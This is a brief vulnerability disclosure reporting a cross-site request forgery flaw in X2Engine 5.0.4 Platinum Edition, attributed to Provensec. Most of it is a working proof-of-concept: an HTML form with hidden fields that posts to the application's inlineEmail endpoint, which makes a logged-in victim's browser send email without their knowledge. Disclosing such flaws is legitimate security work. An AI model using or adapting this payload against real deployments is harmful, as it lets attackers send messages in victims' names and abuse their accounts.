# Affected software: x2 engine
# Type of vulnerability: csrf
# URL: http://demo.x2engine.com
# Discovered by: Provensec
# Website: http://www.provensec.com

#version :*X2Engine 5.0.4 Platinum Edition*
# Proof of concept

x2 engine was not using any csrf token which causes a csrf issue which an
attacker can use to send emails

<html>

  <body>
    <form action="
http://demo.x2engine.com/index.php/emailInboxes/inlineEmail?ajax=1&postReplace=0&contactFlag=1&skipEvent=0"
method="POST">
      <input type="hidden" name="InlineEmail&#91;modelId&#93;" value="" />
      <input type="hidden" name="associationType" value="EmailInboxes" />
      <input type="hidden" name="InlineEmail&#91;modelName&#93;" value="" />
      <input type="hidden" name="contactFlag" value="1" />
      <input type="hidden" name="InlineEmail&#91;credId&#93;" value="1" />
      <input type="hidden" name="InlineEmail&#91;to&#93;"
value="test&#64;tes" />
      <input type="hidden" name="InlineEmail&#91;cc&#93;" value="" />
      <input type="hidden" name="InlineEmail&#91;bcc&#93;" value="" />
      <input type="hidden" name="InlineEmail&#91;subject&#93;"
value="test&#64;tes" />
      <input type="hidden" name="InlineEmail&#91;message&#93;"
value="test&#64;tes" />
      <input type="hidden"
name="InlineEmail&#91;emailInboxesEmailSync&#93;" value="0" />
      <input type="hidden"
name="InlineEmail&#91;emailInboxesEmailSync&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>